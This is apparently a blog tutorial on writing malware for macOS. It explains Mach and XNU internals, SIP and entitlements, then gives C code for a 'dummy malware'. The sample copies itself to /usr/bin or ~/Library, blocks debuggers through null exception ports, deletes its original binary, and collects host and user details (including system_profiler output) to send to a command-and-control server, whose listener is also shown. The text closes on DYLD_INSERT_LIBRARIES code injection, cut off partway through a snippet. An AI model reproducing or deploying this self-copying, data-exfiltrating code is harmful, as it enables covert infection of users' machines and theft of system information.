https://0xf00sec.github.io/0x1A

 

MacOS X Malware Development

In today's post, we'll explore the process of designing and
developing malware for macOS, which is a Unix-based operating system.
We'll use a classic approach to understanding Apple's internals. To
follow along, you should have a basic understanding of exploitation,
as well as knowledge of C and Python programming, and some
familiarity with low-level assembly language. While the topics may be
advanced, I'll do my best to present them smoothly.

Let's start by understanding the macOS architecture and its security
features. Next, we'll dive into the internals, covering key elements
like the Mach API and the kernel, and we'll walk through some basic,
easy-to-understand system calls. After that, we'll introduce a
dummy malware sample. Later, we'll explore code injection techniques
and how they're used in malware, and we'll also discuss persistence
methods. To wrap up, we'll demonstrate a basic implementation of
shellcode injection and persistence. Throughout, we'll provide a
detailed, step-by-step breakdown of the code and techniques involved.

Background

A little background first: the Mac OS X kernel (XNU) is
an operating system kernel with a unique lineage, merging the
research-oriented Mach microkernel with the more traditional and
contemporary FreeBSD monolithic kernel. The Mach microkernel combines
a potent abstraction--Mach message-based interprocess communication
(IPC)--with several cooperating servers to constitute the core of an
operating system. Responsible for managing separate tasks within
their own address spaces and comprising multiple threads, the Mach
microkernel also features default servers that offer services like
virtual memory paging and system clock management.

However, the Mach microkernel alone lacks crucial functionalities
such as user management, file systems, and networking. To address
this, the Mac OS X kernel incorporates a graft of the FreeBSD kernel,
specifically its top-half (system call handlers, file systems,
networking, etc.), ported to run atop the Mach microkernel. To
mitigate performance concerns related to excessive IPC messaging
between kernel components, both kernels reside in the same privileged
address space. Nevertheless, the Mach API accessible from kernel code
remains consistent with the Mach API available to user processes.

OS X

Before delving into macOS development, it's crucial to grasp the
fundamentals of the operating system. In this discussion, we'll
primarily focus on understanding the security protections,
particularly System Integrity Protection (SIP).

SIP serves as a vital security feature designed to safeguard critical
system files, directories, and processes from unauthorized
modification or tampering by applications. It imposes restrictions on
write access to protected system locations, even for processes with
root privileges, thus preventing unauthorized alterations. Moreover,
SIP implements additional security measures for system extensions and
kernel drivers. For instance, kernel extensions are required to be
signed by Apple or by developers using a valid Developer ID. This
stringent requirement ensures that only trusted extensions are
permitted to load into the kernel, bolstering the overall security of
the system.

[IMG1]

As we can see, SIP (System Integrity Protection) is turned on,
indicating that the system is benefiting from its security features.
The presence of the "restricted" flag on certain directories
highlights SIP's protection of those specific areas. It's important
to note that SIP's shielding may not extend to subdirectories within
a SIP-protected directory.

Related to this are firmlinks. Introduced in macOS Catalina alongside
the read-only system volume, a firmlink is a one-to-one link between
a directory on the system volume and a directory on the writable data
volume. Unlike a symbolic link, it is traversed transparently, so
applications and scripts see a single directory tree and need no
special handling.

By making use of firmlinks, the system keeps certain locations
writable while the rest of the system volume stays protected. It
strikes a balance between system protection and accommodating the
needs of applications and scripts. For instance, /usr/local is
firmlinked to the data volume, providing flexibility for installing
and managing software and scripts in that directory. The full list of
firmlinks lives in /usr/share/firmlinks.

Entitlements

Now, onto entitlements. Entitlements are permissions granted to
applications on macOS, dictating their level of access and
capabilities within the system. They control the application's
ability to interact with various system resources, including the
network, file system, hardware, and user privacy-related information.
By granting specific entitlements, macOS ensures that applications
have the necessary permissions to perform their intended tasks while
maintaining system integrity and protecting user privacy.

Entitlements are not stored in the application's Info.plist file.
They are written as a property list (usually a .entitlements file)
and embedded in the code signature when the application is signed.
The Info.plist file, located within the .app bundle, holds metadata
and configuration details about the application instead. Each
entitlement is represented by a key, denoting the specific permission
or access level, and a value that defines its corresponding setting.

  * For example, an entitlement entry may appear as follows:

<key>com.apple.security.network.client</key>
<true/>

In this case, the entitlement with the key
"com.apple.security.network.client" indicates that the application
has permission to act as a network client, granting it access to
network resources.

  * We can obtain entitlements of an application by using the
    following command:

codesign --display --entitlements - /path/to/foo.app

The specific entitlements and their corresponding keys and values can
vary based on the application's requirements and the resources it
needs to access. By defining entitlements, macOS ensures that
applications operate within predefined boundaries, promoting
security, privacy, and controlled access to system resources.

Info.plist

Now, let's talk about property list (plist) files, a file format used
on macOS to store structured data, such as configuration settings,
preferences, and metadata. They have a hierarchical structure with
key-value pairs and support various data types. Property list files
can be in XML or binary format.

In the context of macOS, property list files are commonly used for
storing application metadata, entitlements, sandboxing settings, and
code signing details. For example:

  * Entitlements: A property list embedded in the code signature
    grants permissions to the application, specifying its access to
    system resources.
  * Sandbox: Property list files define sandbox settings that
    restrict an application's access to resources, enhancing security
    and protecting user privacy.
  * Code Signing: Property list files store information related to
    code signing, verifying the authenticity and integrity of an
    application.

Property List (plist) files can hold various data types and have a
hierarchical structure. Here are some commonly used data types and an
example of the plist file structure:

 1. Data Types:
      + String: A sequence of characters.
      + Number: Represents numeric values, including integers and
        floating-point numbers.
      + Boolean: Represents true or false values.
      + Date: Represents a specific date and time.
      + Array: An ordered collection of values.
      + Dictionary: A collection of key-value pairs, where each key
        is unique.

Here's an example of a plist file structure:

<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
  <dict>
    <key>com.apple.security.app-sandbox</key>
    <true/>
    <key>com.apple.security.files.user-selected.read-only</key>
    <true/>
    <key>com.apple.security.network.client</key>
    <true/>
  </dict>
</plist>

In this example, the property list file contains a dictionary with
several entitlement keys related to sandboxing. Each key represents a
specific entitlement, and the value <true/> indicates that the
corresponding entitlement is enabled.

The three entitlements mentioned in this example are:

  * com.apple.security.app-sandbox: Enables sandboxing for the
    application.
  * com.apple.security.files.user-selected.read-only: Allows
    read-only access to user-selected files.
  * com.apple.security.network.client: Grants the application
    permission to act as a network client.

This simplified example demonstrates how property list files can
store entitlements related to sandboxing, providing a structured
format for specifying the application's access and permissions within
the sandbox environment.
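
To make the key/value layout concrete, here is a minimal sketch that checks whether a boolean key is switched on in an XML property list held in memory. The function name plist_flag_enabled is hypothetical, and the code is a naive string scan rather than a real plist parser; on macOS you would normally go through CoreFoundation or plutil instead.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical helper: returns true when `key` appears as
 * <key>key</key> and the next element (ignoring whitespace) is <true/>.
 * This is a plain substring scan, not an XML parser.
 */
bool plist_flag_enabled(const char *xml, const char *key) {
    char needle[256];
    int n;
    const char *p;

    if (xml == NULL || key == NULL) {
        return false;
    }

    /* Build the exact "<key>...</key>" element we are looking for. */
    n = snprintf(needle, sizeof(needle), "<key>%s</key>", key);
    if (n < 0 || (size_t)n >= sizeof(needle)) {
        return false;
    }

    p = strstr(xml, needle);
    if (p == NULL) {
        return false;
    }

    /* Skip the key element and any whitespace that follows it. */
    p += n;
    while (*p != '\0' && isspace((unsigned char)*p)) {
        p++;
    }

    return strncmp(p, "<true/>", 7) == 0;
}
```

Called on the example above, plist_flag_enabled(xml, "com.apple.security.app-sandbox") reports the sandbox entitlement as enabled, while a key that is absent or set to <false/> is reported as disabled.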

  * We can use plutil to read Info.plist in different formats:

plutil -convert xml1 /Applications/Safari.app/Contents/Info.plist -o -
plutil -convert json /Applications/Safari.app/Contents/Info.plist -o -

Overall, property list files play a crucial role in macOS by
providing a structured and standardized format to store important
information related to entitlements, sandboxing, code signing, and
more. They enable applications and system components to access and
manage this data efficiently, contributing to the security and
integrity of the macOS ecosystem.

That's all we need to know for now. There's more to explore, such as
Gatekeeper, Sandboxing, App Bundles, and so on, but these are the
most important security mechanisms that matter to us for development.
Now let's delve a bit deeper and discuss internal architecture. Why
focus on internals? Well, even though I'm not planning to develop a
rootkit or anything as advanced, it's crucial to understand the OS as
thoroughly as possible from a developer's perspective. After all,
we're writing software.

Mach APIs

Let's take a quick look at Mach. Initially designed as a
communication-centric operating system kernel with robust
multiprocessing support, Mach aimed to lay the groundwork for various
operating systems. It favored a microkernel architecture, aiming to
keep essential OS services like file systems, I/O, memory management,
networking, and different OS personalities separate from the kernel.

XNU, whimsically named "X is not UNIX," serves as the kernel for Mac
OS X. Positioned at the core, Darwin and the rest of the OS X
software stack rely on the XNU kernel.

XNU stands out as a hybrid operating system, blending a hardware and I/O
tasking interface from the minimalist Mach microkernel with elements
from FreeBSD kernel and its POSIX-compliant API. Understanding how
programs map to processes in virtual memory on OS X can be a bit
tricky due to overlapping definitions. For example, the term "thread"
could refer to either the POSIX API pthreads from BSD or the
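fundamental unit of execution within a Mach task. Moreover, there are
two distinct sets of syscalls: BSD system calls use positive numbers,
while Mach traps use negative ones (on x86_64 the two are instead
told apart by a class field in the upper bits of the syscall number).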
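
On x86_64, the kernel tells the two syscall families apart by a class field stored in the top byte of the syscall number. The sketch below reproduces that encoding with the constants from XNU's osfmk/mach/i386/syscall_sw.h; the helper names (syscall_construct, syscall_class, syscall_number) are hypothetical and exist only for illustration.

```c
#include <stdint.h>

/* Class encoding used by XNU on x86_64 (osfmk/mach/i386/syscall_sw.h). */
#define SYSCALL_CLASS_SHIFT 24
#define SYSCALL_CLASS_MASK  (0xFFu << SYSCALL_CLASS_SHIFT)
#define SYSCALL_CLASS_MACH  1u /* Mach traps */
#define SYSCALL_CLASS_UNIX  2u /* BSD system calls */

/* Hypothetical helper: combine a class and a syscall index. */
static inline uint32_t syscall_construct(uint32_t cls, uint32_t number) {
    return (cls << SYSCALL_CLASS_SHIFT) | (number & ~SYSCALL_CLASS_MASK);
}

/* Hypothetical helper: extract the class from an encoded number. */
static inline uint32_t syscall_class(uint32_t encoded) {
    return (encoded & SYSCALL_CLASS_MASK) >> SYSCALL_CLASS_SHIFT;
}

/* Hypothetical helper: extract the index within the class. */
static inline uint32_t syscall_number(uint32_t encoded) {
    return encoded & ~SYSCALL_CLASS_MASK;
}
```

For example, the BSD write() call is index 4, so syscall_construct(SYSCALL_CLASS_UNIX, 4) yields 0x2000004, and the Mach trap mach_msg_trap (index 31) becomes 0x100001f.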

Mach provides a virtual machine interface, abstracting system
hardware--a common feature in many operating systems. Its core kernel
is designed to be simple and extensible, boasting an Inter-Process
Communication (IPC) mechanism that underpins many kernel services.
Notably, Mach seamlessly integrates IPC capabilities with its virtual
memory subsystem, leading to optimizations and simplifications across
the OS.

On OS X, we deal with "tasks" rather than processes. Tasks, similar
to processes, serve as OS-level abstractions containing all the
resources needed to execute a program. Technically, Mach refers to
its processes as tasks, although the concept of a BSD-style process
that encapsulates a Mach task persists. Resources within a task
include:

  * A virtual address space
  * Inter-process communication (IPC) port rights
  * One or more threads
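
As a small illustration of a task owning its threads, the sketch below asks the kernel for the thread list of the calling task and returns how many there are. It assumes a macOS build (guarded by __APPLE__); on other platforms the hypothetical count_own_threads() helper simply returns -1.

```c
#ifdef __APPLE__
#include <mach/mach.h>
#endif

/*
 * Hypothetical helper: returns the number of Mach threads in the
 * calling task, or -1 on failure or on a non-macOS platform.
 */
int count_own_threads(void) {
#ifdef __APPLE__
    thread_act_array_t threads = NULL;
    mach_msg_type_number_t count = 0;
    mach_msg_type_number_t i;
    kern_return_t kr;

    /* task_threads() hands back one send right per thread. */
    kr = task_threads(mach_task_self(), &threads, &count);
    if (kr != KERN_SUCCESS) {
        return -1;
    }

    /* Release the port rights and the kernel-allocated array. */
    for (i = 0; i < count; i++) {
        mach_port_deallocate(mach_task_self(), threads[i]);
    }
    vm_deallocate(mach_task_self(), (vm_address_t)threads,
                  count * sizeof(thread_act_t));

    return (int)count;
#else
    return -1;
#endif
}
```

Only the calling task is inspected here, which is why no special privilege is involved: mach_task_self() already gives the process a send right to its own task port.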

"Ports" serve as an inter-task communication mechanism, using
structured messages to transmit information between tasks. Operating
solely in kernel space, ports act like P.O. Boxes, albeit with
restrictions on message senders. Ports are identified by
task-specific 32-bit numbers.

Threads are units of execution scheduled by the kernel. OS X exposes
threads through two interfaces (Mach and pthread). Mach threads are
the kernel-scheduled primitive at the OS's lowest level, while
pthreads are the POSIX API from the BSD realm that user-mode programs
use, layered on top of Mach threads. (More on this later.)

Mach redefines the traditional Unix notion of a process into two
components: a task and a thread. In the kernel, a BSD process aligns
with a Mach task. A task serves as a framework for executing threads,
encapsulating resources and defining a program's protection boundary.
Mach ports, versatile abstractions, facilitate IPC mechanisms and
resource operations.

IPC messages in Mach are exchanged between threads for communication,
carrying actual data or pointers to out-of-line data. Message
transfer is asynchronous, with port capabilities exchanged through
messages.

Mach's virtual memory system encompasses machine-independent
components like address maps and memory objects, alongside
machine-dependent elements like the physical map. Memory objects
serve as containers for data mapped into a task's address space,
managed by various pagers handling distinct memory types. Exception
ports, assigned to each task and thread, facilitate exception
handling, allowing multiple handlers to suspend affected threads,
process exceptions, and resume or terminate threads accordingly.

Let's explore the basics of Mach System Calls, including retrieving
system information and performing code injection. This will provide a
fundamental understanding of interacting with macOS. By the way, a
system call is a kernel function invoked from user space. It
can involve tasks like writing to a file descriptor or exiting a
program. Typically, these system calls are wrapped by C functions in
the standard library.

Baby Steps

If we head over to the Mach IPC interface or Apple's documentation,
we can find a Mach call that's pretty handy for getting basic info
about the host system: host_info(). It reports details such as the
kind of processors installed, the number of physical and logical CPUs
(both currently available and maximum), and the memory size.

Now, like a lot of Mach "info" calls, host_info() needs a flavor
argument to specify what kind of info you want. For instance:

kern_return_t host_info(host_t host, host_flavor_t flavor,
                        host_info_t host_info,
                        mach_msg_type_number_t *host_info_count);

  * HOST_BASIC_INFO: Returns basic system information.
  * HOST_SCHED_INFO: Provides scheduler-related data.
  * HOST_PRIORITY_INFO: Offers scheduler-priority-related
    information.

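#include <mach/mach.h>
#include <stdio.h>
#include <stdlib.h>

// Helper macro to check Mach function calls; reports which call failed
#define EXIT_ON_MACH_ERROR(func, kr) do { \
    if ((kr) != KERN_SUCCESS) { \
        fprintf(stderr, "%s: %s\n", (func), mach_error_string(kr)); \
        exit(1); \
    } \
} while (0)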

Besides host_info(), other calls like host_kernel_version(),
host_get_boot_info(), and host_page_size() can be employed to access
miscellaneous system details.

int main() {
    kern_return_t kr; /* the standard return type for Mach calls */
    mach_port_t myhost;
    kernel_version_t kversion; /* char[512]; a smaller buffer can overflow */
    host_basic_info_data_t hinfo;
    mach_msg_type_number_t count;
    vm_size_t page_size;


    // Retrieve System Information
    printf("Retrieving System Information...\n");

    // Get send rights to the name port for the current host
    myhost = mach_host_self();

    // Get kernel version
    kr = host_kernel_version(myhost, kversion);
    EXIT_ON_MACH_ERROR("host_kernel_version", kr);

    // Get basic host information
    count = HOST_BASIC_INFO_COUNT; // size of the buffer
    kr = host_info(myhost, HOST_BASIC_INFO, (host_info_t)&hinfo, &count);
    EXIT_ON_MACH_ERROR("host_info", kr);

    // Get page size
    kr = host_page_size(myhost, &page_size);
    EXIT_ON_MACH_ERROR("host_page_size", kr);

    // Retrieved information
    printf("Kernel Version: %s\n", kversion);
    printf("Page Size: %u bytes\n", (unsigned int)page_size);
    printf("Host Basic Info:\n");
    printf("  Processor Type: %u\n", hinfo.processor_type);
    printf("  Processor Subtype: %u\n", hinfo.processor_subtype);
    printf("  Physical CPU: %u\n", hinfo.physical_cpu);
    printf("  Physical CPU Max: %u\n", hinfo.physical_cpu_max);
    printf("  Logical CPU: %u\n", hinfo.logical_cpu);
    printf("  Logical CPU Max: %u\n", hinfo.logical_cpu_max);

    // Clean up and exit
    mach_port_deallocate(mach_task_self(), myhost);
    exit(0);
}

So, basically, the code is pretty easy to understand. It just grabs
system information and shows things like the kernel version, right?
It's simple and harmless. But if we want to learn more about system
calls, we need something different. How about something that acts
more like malware? But let's keep it simple at first. We can start by
writing code that writes a copy of itself to either /usr/bin/ or
~/Library/.

To take this kind of behavior further, we would need task operations,
because we'd have to control another process and access system
processes. Mach offers calls such as pid_for_task(), task_for_pid(),
and task_name_for_pid(), which convert between Mach task ports and
Unix PIDs, while mach_task_self() returns the port of the calling
task. However, the conversion calls essentially bypass the capability
model, so macOS restricts them through UID checks, entitlements, SIP,
and so on. They are not documented as part of a public API and are
privileged, typically accessible only to processes with elevated
privileges like root or members of the procview group. This
limitation poses a challenge: malware would need elevated privileges,
or to run under a privileged account, before it could use them.

Thus, we can't use task_for_pid() on Apple platform binaries due to
SIP. However, if permitted, we would have the task port and could
essentially do anything we want, including what I'm about to explain.
So for this example we'll use mach_task_self(), as it does not
require privileges: it simply returns the task port of the current
process.

void hide_process() {
    mach_port_t task_self = mach_task_self();
    kern_return_t kr;

    // Set exception ports to disable debuggers.
    kr = task_set_exception_ports(task_self, EXC_MASK_ALL, MACH_PORT_NULL, EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, THREAD_STATE_NONE);
    if (kr != KERN_SUCCESS) {
        printf("Uh-oh: Failed to set exception ports: %s\n", mach_error_string(kr));
        exit(EXIT_FAILURE);
    }

    printf("Shhh... Process is now hidden\n");
}

The function obtains the task port for the current process using
mach_task_self(), which returns a send right to the task port. In the
Mach kernel, a task port represents a task, and sending a message to
this port enables actions to be performed on the corresponding task.

Next, it calls task_set_exception_ports() to point every task-level
exception port at a null Mach port (MACH_PORT_NULL), so exceptions
raised in the task are no longer delivered to a handler registered
there. The intent is to get in the way of debuggers and other forms
of external monitoring; note that this does not remove the process
from the process list. If the call fails, the function prints an
error and the process exits with a failure status.

void copy_file(const char *source_path, const char *dest_path) {
    FILE *source_file = fopen(source_path, "rb");
    if (source_file == NULL) {
        printf("Oops: Failed to open source file for copying: %s\n", strerror(errno));
        exit(EXIT_FAILURE);
    }

    FILE *dest_file = fopen(dest_path, "wb");
    if (dest_file == NULL) {
        printf("Oops: Failed to open destination file for copying: %s\n", strerror(errno));
        fclose(source_file);
        exit(EXIT_FAILURE);
    }

    char buffer[BUF_SIZE];
    size_t bytes_read;
    while ((bytes_read = fread(buffer, 1, sizeof(buffer), source_file)) > 0) {
        fwrite(buffer, 1, bytes_read, dest_file);
    }

    fclose(source_file);
    fclose(dest_file);

    // Grant execute permission for the copied binary
    if (chmod(dest_path, PERMISSIONS) == -1) {
        printf("Oops: Failed to set execute permission for %s\n", dest_path);
        exit(EXIT_FAILURE);
    }

    printf("Hey! copied from %s to %s\n", source_path, dest_path);
}

The function reads data from the source file in chunks and writes it
to the destination file until the entire file is copied. After
copying, it sets execute permission for the copied binary using
chmod() to make it executable.

// Main function
int main(int argc, char *argv[]) {
    // Determine home directory
    const char *home_dir;
    struct passwd *pw = getpwuid(getuid());
    if (pw == NULL) {
        printf("Oops: Failed to get home directory\n");
        exit(EXIT_FAILURE);
    }
    home_dir = pw->pw_dir;

    // Construct malware path
    char home_malware_path[PATH_MAX_LENGTH];
    snprintf(home_malware_path, sizeof(home_malware_path), "%s/Library/%s", home_dir, MALWARE_NAME);

    // Check if we have root privileges
    if (geteuid() == 0) {
        // Attempt to copy malware to system directory
        const char *system_malware_path = "/usr/bin/" MALWARE_NAME;
        if (access(system_malware_path, F_OK) != 0) {
            copy_file(argv[0], system_malware_path);
            execute_malware(system_malware_path);
        }
    } else {
        // Attempt to copy malware to user's home directory
        if (access(home_malware_path, F_OK) != 0) {
            copy_file(argv[0], home_malware_path);
            greet_user();
        }
    }

    // Hide the process
    hide_process();

    // Vanish, Damn
    remove(argv[0]);

    return EXIT_SUCCESS;
}

So the logic is as follows: it first checks if it has root privileges
by calling geteuid(). If it does, it attempts to copy itself to
/usr/bin/, and if successful, it executes the copied binary. (With
SIP enabled, /usr/bin/ is a protected location, so this copy fails
even for root.) If it doesn't have root privileges, it attempts to
copy itself to ~/Library/ (in the user's home directory). If
successful, it prints "Hello, World!". After copying itself, it calls
hide_process() to attempt to hide the process from detection.
Finally, it removes the original binary file to erase traces of its
presence.

This demonstrates a basic technique used by malware to hide itself on
a system by copying itself to a system directory (/usr/bin/) or the
user's home directory (~/Library/) and then attempting to hide its
process from detection.

This is far from being malicious code, but it does provide us with
valuable insights into working with the Mach API and conducting
low-level system operations. Through this example, we've gained
familiarity with essential concepts such as process management and
communication.

0x100003e79 <+505>: callq  0x100003c50               ; hide_process
0x100003e7e <+510>: movq   0x17b(%rip), %rax         ; (void *)0x0000000000000000
0x100003e85 <+517>: movl   (%rax), %edi
0x100003e87 <+519>: movl   -0x18(%rbp), %esi
0x100003e8a <+522>: callq  0x100003ec6               ; symbol stub for: mach_port_deallocate
0x100003e8f <+527>: xorl   %edi, %edi
0x100003e91 <+529>: movl   %eax, -0x21ec(%rbp)
0x100003e97 <+535>: callq  0x100003eb4               ; symbol stub for: exit

Here we put our little program into a debugger. As you can see in the
disassembly, the instructions correspond to our operations, such as
the call to hide_process, and you can also notice the cleanup being
performed, such as deallocating the port and exiting the program.

The Naive Way

After infecting a new host, let's ensure our malware notifies us of
its presence by sending information about the host. Although this
method might seem amateurish - a malware shouldn't connect to a
Command & Control server (C2) initially - since we're just exploring
macOS as a new territory, it's a starting point. We collect system
information such as the system name, release version, machine
architecture, hardware model, user ID, home directory, etc., and then
send this information to the C2. For retrieving or modifying
information about the system and environment, we can make use of
sysctlbyname() (see Apple's developer documentation). This function
enables us to retrieve specific system information, such as the cache
line size, directly from the kernel.
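
As a rough sketch of how a string-valued name such as "hw.model" or "kern.version" can be read, the hypothetical read_sysctl_string() helper below wraps sysctlbyname() and always leaves the buffer NUL-terminated. It assumes a macOS build (guarded by __APPLE__) and returns -1 everywhere else.

```c
#include <stddef.h>
#ifdef __APPLE__
#include <sys/types.h>
#include <sys/sysctl.h>
#endif

/*
 * Hypothetical helper: copies the string value of the sysctl `name`
 * into `buf`. Returns 0 on success, -1 on failure, bad arguments,
 * or when built for a platform other than macOS.
 */
int read_sysctl_string(const char *name, char *buf, size_t buf_size) {
    if (name == NULL || buf == NULL || buf_size == 0) {
        return -1;
    }
    buf[0] = '\0';

#ifdef __APPLE__
    {
        /* On input, len is the buffer size; on output, bytes written. */
        size_t len = buf_size;
        if (sysctlbyname(name, buf, &len, NULL, 0) != 0) {
            buf[0] = '\0';
            return -1;
        }
        /* Guarantee termination even if the value filled the buffer. */
        buf[buf_size - 1] = '\0';
        return 0;
    }
#else
    return -1;
#endif
}
```

Passing the buffer size through a size_t, and checking the int return value against 0, matches the sysctlbyname() interface; the Mach-style kern_return_t checks used earlier do not apply to it.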

However, when it comes to System Owner/User Discovery, we typically
access user-related data through standard POSIX interfaces like
getpwuid(), relying on these interfaces as discussed before. To fetch
the hardware model, we would replace "hw.cachelinesize" with
"hw.model" in the sysctlbyname function call.

Next, we want to gather more information about the host, not just its
hardware model. Now, you may wonder why we don't just use the first
example. Well, it's simple: this is to showcase how we access
user-related data through standard POSIX interfaces. However, if you
want to add the hardware model to the first example, just add:

size_t model_len = sizeof(model);
// sysctlbyname() returns 0 on success and -1 on error (not a kern_return_t)
if (sysctlbyname("hw.model", model, &model_len, NULL, 0) != 0) {
    perror("sysctl hw.model");
    exit(1);
}

We also want to send information such as the kernel version, to check
for known vulnerabilities that could be used to escalate privileges.
Here's an example; we use the same function as for the hardware model:

size_t len = BUF_SIZE;
if (sysctlbyname("kern.version", kernel_version, &len, NULL, 0) == 0) {
        send_data(sockfd, "\nKernel Version: ");
        send_data(sockfd, kernel_version);
}

Now let's dump and send more information about the profile of the
infected host, including details such as system name, architecture,
login shell, home directory, and any other relevant data that could
aid in further exploiting or maintaining access to the compromised
system. We'll use functions such as uname(), getpwuid(), and
getgrgid(). Let's take a look at the code:

void system_info(int sockfd) {
  struct utsname sys_info;
  char kernel_version[BUF_SIZE];

  // Get system information
  if (uname(&sys_info) != 0) {
    send_error("Failed to get system information");
    return;
  }

  send_data(sockfd, "\nSystem Name: ");
  send_data(sockfd, sys_info.sysname);
  send_data(sockfd, "\nRelease Version: ");
  send_data(sockfd, sys_info.release);
  send_data(sockfd, "\nMachine Architecture: ");
  send_data(sockfd, sys_info.machine);
  send_data(sockfd, "\nOperating System: ");
  send_data(sockfd, sys_info.sysname);
  send_data(sockfd, "\nVersion: ");
  send_data(sockfd, sys_info.version);

  // ... kernel version and user details follow in the full source
}

So, the function is pretty self-explanatory; it simply provides a
snapshot of the system and user environment, which is crucial for
gathering information on potential targets. However, since malware
typically only has one chance for infection, it needs to be
self-reliant before attempting to Phone Home. This is why the
approach of using a dummy malware, primarily for testing and
exploring options before developing an actual malware, is essential.
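
To see the same POSIX interfaces in isolation, here is a minimal sketch that formats the uname() and getpwuid() fields into a caller-supplied buffer instead of sending them anywhere. The describe_host() name and the exact output layout are assumptions made for this example, not part of the original sample.

```c
#include <pwd.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <unistd.h>

/*
 * Hypothetical helper: writes a short host/user summary into `out`.
 * Returns the number of characters written (excluding the NUL), or
 * -1 if a lookup fails or the buffer is too small.
 */
int describe_host(char *out, size_t out_size) {
    struct utsname sys_info;
    const struct passwd *pw;
    int n;

    if (out == NULL || out_size == 0) {
        return -1;
    }

    /* POSIX only promises a non-negative value on success. */
    if (uname(&sys_info) < 0) {
        return -1;
    }

    /* May be NULL, e.g. when the UID has no passwd entry. */
    pw = getpwuid(getuid());

    n = snprintf(out, out_size,
                 "System Name: %s\n"
                 "Release Version: %s\n"
                 "Machine Architecture: %s\n"
                 "User: %s\n"
                 "Home Directory: %s\n"
                 "Login Shell: %s\n",
                 sys_info.sysname, sys_info.release, sys_info.machine,
                 pw != NULL ? pw->pw_name : "unknown",
                 pw != NULL ? pw->pw_dir : "unknown",
                 pw != NULL ? pw->pw_shell : "unknown");

    /* snprintf reports truncation by returning >= out_size. */
    if (n < 0 || (size_t)n >= out_size) {
        return -1;
    }
    return n;
}
```

Keeping the formatting separate from the transport makes the lookup code easy to test on its own, and the NULL check on getpwuid() covers accounts without a passwd entry.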

Nevertheless, deploying a dummy malware still provides attackers with
a significant amount of information that could be leveraged for
subsequent targeted attacks or exploiting vulnerabilities, whether in
the kernel or user land. The malware could be multi-staged to ensure
stealth and a low profile. This code can act as stage 1 of an attack,
proliferating itself in the system, waiting to activate stage 2, and
so on. These types of attacks are advanced and hard to detect,
especially in environments like macOS, where malware can remain
undetected for years.

Another type of information gathering employed by macOS malware, as
seen in some reports, involves 'LOLBins' (Living off the Land
Binaries). You can program the malware to simply execute /usr/sbin/
system_profiler -nospawn -detailLevel full, For example.

void system_profiler(int sockfd) {
  FILE * fp;
  char buffer[BUF_SIZE];

  // Execute
  fp = popen("/usr/sbin/system_profiler -nospawn -detailLevel full", "r");
  if (fp == NULL) {
    send_error("Failed");
    return;
  }

  // Read command output and send over to C2 
  while (fgets(buffer, BUF_SIZE, fp) != NULL) {
    send_data(sockfd, buffer);
  }

  pclose(fp);
}

This command alone saves the trouble and provides all the information
about a host that an attacker can gather. However, the catch is that
such commands are visible and can be easily flagged. Despite this, it
remains an easy and effective method for malware to extract details
from the infected host.

Alright, so how do we transmit the data? We use a socket. This API
allows us to send data to the connected endpoint, which in this case
is the Command & Control server. Data is sent in the form of strings.
To ensure that the data is properly formatted and transmitted over
the socket to the C2 server, we rely on functions like send() for
sending data, and file I/O functions such as popen() and fgets() for
reliable reading and sending of data. It's pretty simple.

The C2 server is also straightforward, designed solely for handling
incoming connections. It won't have any protection mechanisms to hide
itself from the system where it's running, but this server is basic
for demonstration purposes only. I recommend implementing encryption,
setting up a database to organize data, and generating a temporary ID
to associate with each instance.

The extraction module (ext) starts an autonomous thread listening for
incoming connections from malware instances. Once connected, the
module simply prints the content of the incoming connection (which is
the information extracted by the client) to the standard output.

// The server will keep listening for incoming connections indefinitely
while (1) {
    // Accept a new connection from a client
    cltlen = sizeof(cltaddr);
    cltfd = accept(dexft_fd, (struct sockaddr *) &cltaddr, &cltlen);

    // Check if the accept call was successful
    if (cltfd < 0) {
        // If accept failed, print an error message and continue listening
        printf("Failed to accept incoming connection, %d\n", cltfd);
        continue;
    }

    // Print out information about the connected client
    printf("Collecting data from client %s:%d...\n", inet_ntoa(cltaddr.sin_addr), ntohs(cltaddr.sin_port));

    // Receive data from the client and process it
    while ((br = recv(cltfd, buf, BUF_SIZE, 0)) > 0) {
        // Write the received data to the standard output
        fwrite(buf, 1, br, stdout);
    }

    // Check if an error occurred during data reception
    if (br < 0) {
        printf("ERROR: Failed to receive data from client!\n");
    }

    // Close the client socket
    close(cltfd);
}

return NULL;


As you can see, the code itself is quite simple yet functional. Once
the client is executed, the server collects data from the connected
clients, and then closes the connection before resuming listening for
new connections:

Collecting data from client ...

System Name: Darwin
Release Version: 19.6.0
Machine Architecture: x86_64
Operating System: Darwin

Obviously, this will get flagged within seconds if there's a security
mechanism in place. Why, you may ask? Well, the behavior exhibited
here screams malware--from establishing a connection to sending system
information and continuously receiving and executing commands from a
remote server. The network traffic pattern alone is a red flag. Plus,
the transmission of system information immediately after connection
establishment... But the good news is that most Mac users assume
they're safe by default, so they don't entertain the idea that
capable malware could go unnoticed.

So, if this were a targeted attack, something with a bit of
obfuscation, perhaps polymorphic and advanced covert channels for
communication in place, would get the job done. However, this
explanation provides a simple overview of how dummy malware can be
used as a learning piece of code before developing actual malware.
Next, we'll delve into a topic that I find quite interesting. Yes,
you guessed it:

Code Injection

Actually, exploring Code Injection deserves its own article, and I'll
include some resources at the end. However, for now, let's focus on
two techniques that I find quite effective. Let's begin with the
first technique, which leverages the DYLD_INSERT_LIBRARIES
environment variable for code injection.

DYLD_INSERT_LIBRARIES is a powerful feature that allows users to
preload dynamic libraries into applications. Both developers and
attackers can use it to inject code into a process at launch without
modifying the original executable file. It is commonly used to
intercept function calls, manipulate program behavior, or even
introduce malicious functionality into a legitimate application. As
we're going to see, it's basically a colon-separated list of dynamic
libraries to load before the ones specified in the program. This lets
you test new modules of existing dynamic shared libraries that are
used in flat-namespace images by loading a temporary dynamic shared
library with just the new modules.
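
To make the colon-separated format concrete, here is a minimal Python
sketch that splits the variable into the ordered list of libraries
dyld would be asked to load. The helper name parse_insert_libraries
and the sample paths are made up for illustration; the same parsing
is handy on the defensive side when inspecting a process environment.

```python
import os


def parse_insert_libraries(env=None):
    """Split DYLD_INSERT_LIBRARIES into the ordered list of dylib paths."""
    env = os.environ if env is None else env
    raw = env.get("DYLD_INSERT_LIBRARIES", "")
    # Entries are separated by colons; empty entries are dropped.
    return [path for path in raw.split(":") if path]


if __name__ == "__main__":
    # Hypothetical environment, not taken from a real process.
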